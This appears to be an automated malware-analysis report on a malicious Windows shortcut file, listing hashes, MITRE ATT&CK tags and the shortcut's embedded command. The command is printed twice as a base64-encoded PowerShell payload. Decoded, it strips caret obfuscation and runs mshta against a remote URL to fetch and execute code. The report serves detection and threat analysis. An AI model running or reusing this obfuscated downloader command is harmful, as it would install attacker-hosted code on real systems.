Malicious

75f59f9c03b721915c2239610c1b5272

LNK File | MD5: 75f59f9c03b721915c2239610c1b5272 | Size: 2.63 KB | application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Characteristics
Hash | Hash Value
MD5 | 75f59f9c03b721915c2239610c1b5272
Sha1 | f82a63e52de3bfa5b1016e65871293e394357d8b
Sha256 | 49fcf9080afcb05987918952b9cbdcaf3bdfb369928d6372ca73f3a8e4b54f6f
Sha384 | 6b974ea8ec49f3338799ec8606d4b8208d05c16276793b3fd5b0d2c1bd65f76d29af7e3ebdaecb4609fa530acf4b6ad4
Sha512 | ef8595a030efb9391384f1042ec2c4b89e0e1b3edb63a8716de1a7e6edc73029e22799037951d098fc82e0a3b6e6022fda70af24ff90e32af84e8db6a11b8e57
SSDeep | 24:8Ayw/BHYVKVWf+/CW+RO0OaTfHgcU0IMJm0sHCEJMdd79dsrab7Z:8y5aXRTt0cU0IMJUiuMdJ9AaZ
TLSH | 2151C3281AF502EAF677CBB9A7F973B24876FB96CD2546BC008023411622510B467E7A
File Structure
75f59f9c03b721915c2239610c1b5272
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAG0AcwBeAF4AXgBeAGgAXgBeAF4AdABhACAAXgBeAF4AXgBoAHQAXgBeAF4AdABeAF4AXgBwAF4AXgBeAF4AcwBeADoAXgBeAF4AXgAvAF4AXgBeAC8AdwB3AF4AXgBeAHcALgBmAF4AXgBeAF4AcgBeAF4AbwBeAF4AbgBeAHQAaQBeAF4AXgBeAGUAcgBeAF4AXgAuAF4AXgBeAG4AXgBeAGUAXgBeAF4AdABeAC4AcABrAC8AXgBSAF4AXgBeAGUAZABeAC4AXgBeAG0AXgBeAF4AXgBwADQAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA

Deobfuscated PowerShell

-e "cwBjAGIAIAAnAG0AcwBeAF4AXgBeAGgAXgBeAF4AdABhACAAXgBeAF4AXgBoAHQAXgBeAF4AdABeAF4AXgBwAF4AXgBeAF4AcwBeADoAXgBeAF4AXgAvAF4AXgBeAC8AdwB3AF4AXgBeAHcALgBmAF4AXgBeAF4AcgBeAF4AbwBeAF4AbgBeAHQAaQBeAF4AXgBeAGUAcgBeAF4AXgAuAF4AXgBeAG4AXgBeAGUAXgBeAF4AdABeAC4AcABrAC8AXgBSAF4AXgBeAGUAZABeAC4AXgBeAG0AXgBeAF4AXgBwADQAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA"

Characteristics
No malware configuration was found at this point.